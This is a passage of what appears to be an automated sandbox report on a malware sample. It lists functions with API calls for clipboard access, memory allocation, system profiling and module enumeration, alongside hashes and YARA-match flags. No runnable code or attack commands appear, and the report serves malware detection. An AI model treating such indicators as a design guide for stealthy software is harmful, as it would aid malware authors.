                                                                        • Source File: 00000006.00000002.2346072307.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000006.00000002.2346072307.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_38F9.jbxd
                                                                        Similarity
                                                                        • API ID: AllocateHeapInitializeThunk
                                                                        • String ID: ' !"$' !"
                                                                        • API String ID: 383220839-2992046883
                                                                        • Opcode ID: 0c8d33f455aaeda71f367bc1a85251f941ffcf9619c9c8334509971ed68fcd7c
                                                                        • Instruction ID: 49029cdadb5bea51e7c95a6cf9f0ae72fab10a27c8d8936e17b82ca3964a6608
                                                                        • Opcode Fuzzy Hash: 0c8d33f455aaeda71f367bc1a85251f941ffcf9619c9c8334509971ed68fcd7c
                                                                        • Instruction Fuzzy Hash: 0381AC756093019FD718CF14C994B2BBBE1FB88708F54992DE9885B382C779DC05DB8A
                                                                        Function 0042B5E8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 82memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2346072307.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000006.00000002.2346072307.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_38F9.jbxd
                                                                        Similarity
                                                                        • API ID: AllocString
                                                                        • String ID: *$,
                                                                        • API String ID: 2525500382-162240353
                                                                        • Opcode ID: 6f887dd92c1e7d051b441eb50b8ce683dfa68637c71dffcb6e4b95598e80c62e
                                                                        • Instruction ID: 8755544d7d26afcd6c5da590c34bf048d679cfec69adbb61e5b4e032c319a10d
                                                                        • Opcode Fuzzy Hash: 6f887dd92c1e7d051b441eb50b8ce683dfa68637c71dffcb6e4b95598e80c62e
                                                                        • Instruction Fuzzy Hash: 2641C27450D7C18ED371CB28845C78BBFE0AB9A324F148A4DE0E94B2E2CB74510ADB97
                                                                        Function 004283B9 Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 386COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042893E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2346072307.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000006.00000002.2346072307.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_38F9.jbxd
                                                                        Similarity
                                                                        • API ID: InstalledMemoryPhysicallySystem
                                                                        • String ID: sflQ
                                                                        • API String ID: 3960555810-3249545781
                                                                        • Opcode ID: 8302543d336a64d61fbfd091ffaf374d6ea3bc29c3405159477e15a25cf067dc
                                                                        • Instruction ID: ceaf3b536834eb6ea101402e43ebfa27eafed5b2e0152b17aac62569a04a8eaf
                                                                        • Opcode Fuzzy Hash: 8302543d336a64d61fbfd091ffaf374d6ea3bc29c3405159477e15a25cf067dc
                                                                        • Instruction Fuzzy Hash: 42E16F70205B918AD7258F39C4A47E7BBE1BF16305F98499EC0EB8B382DB396409CB55
                                                                        Function 0042880F Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 322COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042893E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2346072307.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000006.00000002.2346072307.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_38F9.jbxd
                                                                        Similarity
                                                                        • API ID: InstalledMemoryPhysicallySystem
                                                                        • String ID: sflQ
                                                                        • API String ID: 3960555810-3249545781
                                                                        • Opcode ID: eda0b82203ec5fd52a02e42ad8bc985fa3b6130ce1cc9c57a209a743f85e5ba8
                                                                        • Instruction ID: 4579460111167dd6f514478598ab714a340966e7b3f1678d87b811800d9ff980
                                                                        • Opcode Fuzzy Hash: eda0b82203ec5fd52a02e42ad8bc985fa3b6130ce1cc9c57a209a743f85e5ba8
                                                                        • Instruction Fuzzy Hash: A7C17F70205B918AD725CF35C4A07E7BBE1BF16304F98495ED0EB8B382DB796409CB55
                                                                        Function 0043551D Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 57memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 004355C8
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2346072307.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000006.00000002.2346072307.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_38F9.jbxd
                                                                        Similarity
                                                                        • API ID: FreeHeap
                                                                        • String ID: \-"#
                                                                        • API String ID: 3298025750-2514456039
                                                                        • Opcode ID: 859eba75cc14126060daa5553d4e99eea4a1c63d27fd1e683f7c5ac40af54193
                                                                        • Instruction ID: 4e5805d71c6b113a9038e1d4705d07e5b3b04c5f079926af7e5af699945cb8d6
                                                                        • Opcode Fuzzy Hash: 859eba75cc14126060daa5553d4e99eea4a1c63d27fd1e683f7c5ac40af54193
                                                                        • Instruction Fuzzy Hash: 5A1151716083019FD708CF50D8A475FFBE2FBC4328F148A1DE4A917691C3B99909CB86
                                                                        Function 00414EC0 Relevance: 3.2, APIs: 2, Instructions: 181COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 00414EFA
                                                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,?,?), ref: 00414F28
                                                                          • Part of subcall function 00435440: RtlAllocateHeap.NTDLL(?,00000000,?), ref: 004354DD
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2346072307.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000006.00000002.2346072307.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_38F9.jbxd
                                                                        Similarity
                                                                        • API ID: EnvironmentExpandStrings$AllocateHeap
                                                                        • String ID:
                                                                        • API String ID: 3432729115-0
                                                                        • Opcode ID: 9a53a9201fbbf031bf3ec0bbcf05d332dbfb10e1ddfa8b4e88992b5ce484714e
                                                                        • Instruction ID: 3bef7b545c1fe862b70271ecfb8295d17d8257d1e606da934cadffb5b9659bed
                                                                        • Opcode Fuzzy Hash: 9a53a9201fbbf031bf3ec0bbcf05d332dbfb10e1ddfa8b4e88992b5ce484714e
                                                                        • Instruction Fuzzy Hash: C351E0B41043018BD324CF14C891BABBBE5FFC5718F048A1DF9A69B391EB789941CB96
                                                                        Function 00417A30 Relevance: 3.1, APIs: 2, Instructions: 64COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 00417A6A
                                                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,?,?), ref: 00417A98
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2346072307.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000006.00000002.2346072307.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_38F9.jbxd
                                                                        Similarity
                                                                        • API ID: EnvironmentExpandStrings
                                                                        • String ID:
                                                                        • API String ID: 237503144-0
                                                                        • Opcode ID: 068419ec1a366db8bddaf31dae3676283e5c1e8fd397c4a83bf892c92bc97e90
                                                                        • Instruction ID: 9d185849e125c65ed9e76077d369fe8678050950fd45e526c791e55ee9a7ec59
                                                                        • Opcode Fuzzy Hash: 068419ec1a366db8bddaf31dae3676283e5c1e8fd397c4a83bf892c92bc97e90
                                                                        • Instruction Fuzzy Hash: 0F01D2755482047FD310AB25CC86F67776CEB86764F044619F9668B2D1EB30A908C6B6
                                                                        Function 005DE736 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 005DE75E
                                                                        • Module32First.KERNEL32(00000000,00000224), ref: 005DE77E
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2346623744.00000000005DD000.00000040.00000020.00020000.00000000.sdmp, Offset: 005DD000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_5dd000_38F9.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                        • String ID:
                                                                        • API String ID: 3833638111-0
                                                                        • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                        • Instruction ID: 20a9975d23102be5df46716d2ae3858d655e13fe49d6e1bb2d42375394aca89e
                                                                        • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                        • Instruction Fuzzy Hash: 51F09631500711AFD7703BFD988EB6E7AE8FF59725F10052BE642961C0DB70EC454661
                                                                        Function 00560E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SetErrorMode.KERNELBASE(00000400,?,?,00560223,?,?), ref: 00560E19
                                                                        • SetErrorMode.KERNELBASE(00000000,?,?,00560223,?,?), ref: 00560E1E
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2346451120.0000000000560000.00000040.00001000.00020000.00000000.sdmp, Offset: 00560000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_560000_38F9.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ErrorMode
                                                                        • String ID:
                                                                        • API String ID: 2340568224-0
                                                                        • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                        • Instruction ID: a5b931f4ea7891f8ec39f80adb89aa55d3030c8fd74fa9dfc01ba301779e0f72
                                                                        • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                        • Instruction Fuzzy Hash: 6CD0123154512877D7102A94DC09BCE7F1CDF05B62F008411FB0DD9080C771994046E5
                                                                        Function 00436D86 Relevance: 1.6, APIs: 1, Instructions: 67libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2346072307.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000006.00000002.2346072307.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_38F9.jbxd
                                                                        Similarity
                                                                        • API ID: LibraryLoad
                                                                        • String ID:
                                                                        • API String ID: 1029625771-0
                                                                        • Opcode ID: dc9adec9b8184aaf73981e838b522b6d47d30a6e16419426b755bca3264c8062
                                                                        • Instruction ID: 50cfc2c49a3083e08c64fd866987bc454676edab02516c1ee8da21e686402dde
                                                                        • Opcode Fuzzy Hash: dc9adec9b8184aaf73981e838b522b6d47d30a6e16419426b755bca3264c8062
                                                                        • Instruction Fuzzy Hash: 4821D2B4501A02AFE715DF25D8D1A2ABBB2FB86305F10C23EC85647B15DB38A455CFD8
                                                                        Function 0043724D Relevance: 1.6, APIs: 1, Instructions: 66memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RtlReAllocateHeap.NTDLL(00000000,00000000), ref: 004372ED
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2346072307.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000006.00000002.2346072307.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_38F9.jbxd
                                                                        Similarity
                                                                        • API ID: AllocateHeap
                                                                        • String ID:
                                                                        • API String ID: 1279760036-0
                                                                        • Opcode ID: ad23319594c346ecf424d56c5213ed755dd05cb4f309e994e67b51aad4c8c90e
                                                                        • Instruction ID: d108b6c160ddb040137915c382c094585e6d719fb6ca8c5299172bcdf25914e1
                                                                        • Opcode Fuzzy Hash: ad23319594c346ecf424d56c5213ed755dd05cb4f309e994e67b51aad4c8c90e
                                                                        • Instruction Fuzzy Hash: 131113751083409FD700CF04D49470BB7A2EFC5318F65CA5CE8A81B25AC379A90ACB9A
                                                                        Function 00435440 Relevance: 1.5, APIs: 1, Instructions: 46memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RtlAllocateHeap.NTDLL(?,00000000,?), ref: 004354DD
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2346072307.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000006.00000002.2346072307.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_38F9.jbxd
                                                                        Similarity
                                                                        • API ID: AllocateHeap
                                                                        • String ID:
                                                                        • API String ID: 1279760036-0
                                                                        • Opcode ID: 79dca1b32247aa9b70ad2c1bcd7dcd008df1434939f9a33d85ef6ce44ca53825
                                                                        • Instruction ID: 3dda7e75f36cf504926de81a89fda72ed932754256e5c243a5fe3c5ff6ff8171
                                                                        • Opcode Fuzzy Hash: 79dca1b32247aa9b70ad2c1bcd7dcd008df1434939f9a33d85ef6ce44ca53825
                                                                        • Instruction Fuzzy Hash: 731125705083009FD708CF10C46476BBBA1EB85328F108A1DE8A917681C379DA09CBC6
                                                                        Function 004373E0 Relevance: 1.5, APIs: 1, Instructions: 12libraryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LdrInitializeThunk.NTDLL(0043A22C,005C003F,00000006,00120089,?,00000018,' !",00000000,004150CA), ref: 00437406
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2346072307.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000006.00000002.2346072307.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_38F9.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 3af67e3b8a4cf002b2d8122619789f5e408d063de0ae60c6913db66b84c766ee
                                                                        • Instruction ID: 9a2a3e30e6272c7ba4599b7d5b49d8b1df743313db24dc7d28a19b0c9381744b
                                                                        • Opcode Fuzzy Hash: 3af67e3b8a4cf002b2d8122619789f5e408d063de0ae60c6913db66b84c766ee
                                                                        • Instruction Fuzzy Hash: 82D04875908216AB9A09CF44C54040EFBE6BFC4714F228C8EA88873214C3B0BD46EB82
                                                                        Function 005DE3F5 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 005DE446
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2346623744.00000000005DD000.00000040.00000020.00020000.00000000.sdmp, Offset: 005DD000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_5dd000_38F9.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID:
                                                                        • API String ID: 4275171209-0
                                                                        • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                        • Instruction ID: 4da6518b79bbe385ab8379358804c9389714c8ed0778a00148d6314da73bd80b
                                                                        • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                        • Instruction Fuzzy Hash: 82112B79A00208EFDB01DF98C989E98BFF5AF08350F058095F9489B362D371EA90DF80

                                                                        Non-executed Functions

                                                                        Function 0042EAB0 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 127clipboardCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2346072307.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000006.00000002.2346072307.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_38F9.jbxd
                                                                        Similarity
                                                                        • API ID: Clipboard$Global$CloseDataInfoLockOpenUnlockWindow
                                                                        • String ID: @$A$C$F
                                                                        • API String ID: 3829817484-319984173
                                                                        • Opcode ID: 8ad0d9297b1ef162b2248c3ebd06f01706d8c7b0091a801e9c92d9469685e51b
                                                                        • Instruction ID: 15be754739b74540689589334df2f87df7105b9426ed1557cb94c4d1065241c1
                                                                        • Opcode Fuzzy Hash: 8ad0d9297b1ef162b2248c3ebd06f01706d8c7b0091a801e9c92d9469685e51b
                                                                        • Instruction Fuzzy Hash: 9B513D7060C391CFD300DF6AA48875FBFE0AB96364F940A6EF4D58A291C738954A8B57
                                                                        Function 004016E0 Relevance: 15.5, Strings: 12, Instructions: 492COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2346072307.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000006.00000002.2346072307.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_38F9.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: .$.$0$Uh$C$Wn$[$false$null$true${$+$8o
                                                                        • API String ID: 0-879020378
                                                                        • Opcode ID: d3e6218c0b6d68e631ba44012775654cbb5f14155eaeb5d0a54eed9368251c96
                                                                        • Instruction ID: bd7178ecccf1f1e773a4192e4ca540b31a3e3f12fd5816677c43404a507449fe
                                                                        • Opcode Fuzzy Hash: d3e6218c0b6d68e631ba44012775654cbb5f14155eaeb5d0a54eed9368251c96
                                                                        • Instruction Fuzzy Hash: B9F104B0A003059FE7105F65D885727BBE4AF54308F14853EE886A73E2EB3DE914CB5A
                                                                        Function 00417062 Relevance: 10.3, Strings: 8, Instructions: 344COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2346072307.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000006.00000002.2346072307.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_38F9.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: !I$O$*M*S$-E>K$B5E;$I-@3$L9_?$W=WC$[)M/
                                                                        • API String ID: 0-4068174152
                                                                        • Opcode ID: 26436c3c5eaa3c87bf30491f8fb8102a7c5f323278362c9e03f2b8f6bc4fdb47
                                                                        • Instruction ID: c5e2fc403fb0cec226c3ddd8a9dc625652c1aa2ba632ddc363c6cf4a8812eb13
                                                                        • Opcode Fuzzy Hash: 26436c3c5eaa3c87bf30491f8fb8102a7c5f323278362c9e03f2b8f6bc4fdb47
                                                                        • Instruction Fuzzy Hash: CBC1AAB1104B018BD328CF14C5A1B63B7B2FF56318F28865DC8A64BB91E779F891CB94
                                                                        Function 005772C9 Relevance: 10.3, Strings: 8, Instructions: 344COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2346451120.0000000000560000.00000040.00001000.00020000.00000000.sdmp, Offset: 00560000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_560000_38F9.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: !I$O$*M*S$-E>K$B5E;$I-@3$L9_?$W=WC$[)M/
                                                                        • API String ID: 0-4068174152
                                                                        • Opcode ID: fff0af72006f123bcc6fc661a3252df57c55cfd64bb4fe08b2f90c9271b5dd27
                                                                        • Instruction ID: b58971d266a8213a8aed4c0f37ad71aa8ab9507b19cceaa80f3336f56fe6fbc3
                                                                        • Opcode Fuzzy Hash: fff0af72006f123bcc6fc661a3252df57c55cfd64bb4fe08b2f90c9271b5dd27
                                                                        • Instruction Fuzzy Hash: 2FC18AB1504B018BD728CF14D4A1B22BBB2FF5A314F198A5CC8AA4FB91E775F851DB90
                                                                        Function 004223B8 Relevance: 9.3, Strings: 7, Instructions: 552COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2346072307.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000006.00000002.2346072307.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_38F9.jbxd
                                                                        Similarity
                                                                        • API ID: AllocateHeap
                                                                        • String ID: "$"(B$0$5Q$B(B$P%B$b%B
                                                                        • API String ID: 1279760036-2560538612
                                                                        • Opcode ID: d47fa415301365560c3d99d206a890aaa13eccf696f161fa7df0d9d55ca40e3c
                                                                        • Instruction ID: ae90b01d8c300a32a6ec655623065aa85ae112dbe4b9f4c81515b6d4964649e2
                                                                        • Opcode Fuzzy Hash: d47fa415301365560c3d99d206a890aaa13eccf696f161fa7df0d9d55ca40e3c
                                                                        • Instruction Fuzzy Hash: 851266316083909FD324CF28D85076ABBE2AFC6324F59866EE4958B3E1C779CD45CB46
                                                                        Function 00569BC7 Relevance: 6.7, Strings: 5, Instructions: 472COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2346451120.0000000000560000.00000040.00001000.00020000.00000000.sdmp, Offset: 00560000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_560000_38F9.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 0$01$ZR\;$[hct${hmn
                                                                        • API String ID: 0-1484469362
                                                                        • Opcode ID: 46fbbb30a144e6cdf2b1d370ae05e1a5de9fab85d772feda1479b6a92d328fba
                                                                        • Instruction ID: f311ee8ff58e13691d8972d2f559eb836020ab926650242e4713ffbc93f44c6f
                                                                        • Opcode Fuzzy Hash: 46fbbb30a144e6cdf2b1d370ae05e1a5de9fab85d772feda1479b6a92d328fba
                                                                        • Instruction Fuzzy Hash: E21202B02083818BE724CF54C4A4B6FBBF5BBD6348F144D2DE5958B292D77AD809CB52
                                                                        Function 00423C97 Relevance: 6.6, APIs: 4, Instructions: 619COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,00000009,00000000,00000000,?), ref: 00423D8D
                                                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,00000009,00000000,?,?), ref: 00423DB6
                                                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,00000009,00000000,00000000,?), ref: 004241CD
                                                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,00000009,00000000,?,?), ref: 004241FB
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2346072307.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000006.00000002.2346072307.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_38F9.jbxd
                                                                        Similarity
                                                                        • API ID: EnvironmentExpandStrings
                                                                        • String ID:
                                                                        • API String ID: 237503144-0
                                                                        • Opcode ID: d4d6b6a8b49c0bb25a3653efa362111b955856ebe702b21ad3d56c6c9453a05c
                                                                        • Instruction ID: e81b59cdcbc34e311b7fbd4a7f811c95e6a6bbd50fbc0b950e223fe6d83b0846
                                                                        • Opcode Fuzzy Hash: d4d6b6a8b49c0bb25a3653efa362111b955856ebe702b21ad3d56c6c9453a05c
                                                                        • Instruction Fuzzy Hash: 6D3257B4600B009FD728CF29C495B17BBB2FB85314F158A5DE8A64BB89D774E809CBD1
                                                                        Function 00583EFE Relevance: 6.6, APIs: 4, Instructions: 619COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,DF3FD14C), ref: 00583FF4
                                                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,?,DF3FD14C), ref: 0058401D
                                                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,2FDE2DC1,00000009,00000000,00000000,?), ref: 00584434
                                                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,2FDE2DC1,00000009,00000000,?,?), ref: 00584462
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2346451120.0000000000560000.00000040.00001000.00020000.00000000.sdmp, Offset: 00560000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_560000_38F9.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: EnvironmentExpandStrings
                                                                        • String ID:
                                                                        • API String ID: 237503144-0
                                                                        • Opcode ID: 6721b5089de62f2581515a1f3700886ae7ab926132f011bbbe8c8f6fc0b297ab
                                                                        • Instruction ID: 4a310fb9faf9a495c0e28834aa825ba3ce606baf338b894b4f8018a730c31087
                                                                        • Opcode Fuzzy Hash: 6721b5089de62f2581515a1f3700886ae7ab926132f011bbbe8c8f6fc0b297ab
                                                                        • Instruction Fuzzy Hash: C63267B4500B019FD728CF29C495B17BBB2FB85314F148A5CE8A64BB9AD774E806CBD1
                                                                        Function 00583ECF Relevance: 6.6, APIs: 4, Instructions: 614COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,00000000,DF3FD14C), ref: 00583FF4
                                                                        • RtlExpandEnvironmentStrings.NTDLL(00000000,?,00000009,00000000,?,DF3FD14C), ref: 0058401D
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2346451120.0000000000560000.00000040.00001000.00020000.00000000.sdmp, Offset: 00560000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_560000_38F9.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: EnvironmentExpandStrings
                                                                        • String ID:
                                                                        • API String ID: 237503144-0
                                                                        • Opcode ID: 217409ddc3c94f618525d253030682f72d4f3ca85dca1c4465c4694fb7a70ead
                                                                        • Instruction ID: 83dee68c9cb68ba461f3d1a26e8c0e686b5153dd73db0d09032d36976fc24c98
                                                                        • Opcode Fuzzy Hash: 217409ddc3c94f618525d253030682f72d4f3ca85dca1c4465c4694fb7a70ead
                                                                        • Instruction Fuzzy Hash: F43256B4500B019FD728CF28C495B17BBB2BF85314F158A5CD8A64BB9AD774E80ACBD1
                                                                        Function 00421C71 Relevance: 5.4, Strings: 4, Instructions: 369COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2346072307.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000006.00000002.2346072307.0000000000451000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_38F9.jbxd
                                                                        Similarity
                                                                        • API ID: AllocateHeap
                                                                        • String ID: /V.W$2 B$J>;0$gdeb
                                                                        • API String ID: 1279760036-1943473526
                                                                        • Opcode ID: b677bb330bcbed95735b484cae22a33eb07d18e121d84d5491ef0f7b04aa1ca3
                                                                        • Instruction ID: 1f1b32295078fd643b98cacce706d452a3674876845b3b7fea61ac9470719d4c
                                                                        • Opcode Fuzzy Hash: b677bb330bcbed95735b484cae22a33eb07d18e121d84d5491ef0f7b04aa1ca3
                                                                        • Instruction Fuzzy Hash: A1D18AB56083518FC724CF28D89072BBBE1BFCA314F954A6DE89987391D774E901CB86
                                                                        Function 00581C89 Relevance: 5.1, Strings: 4, Instructions: 126COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
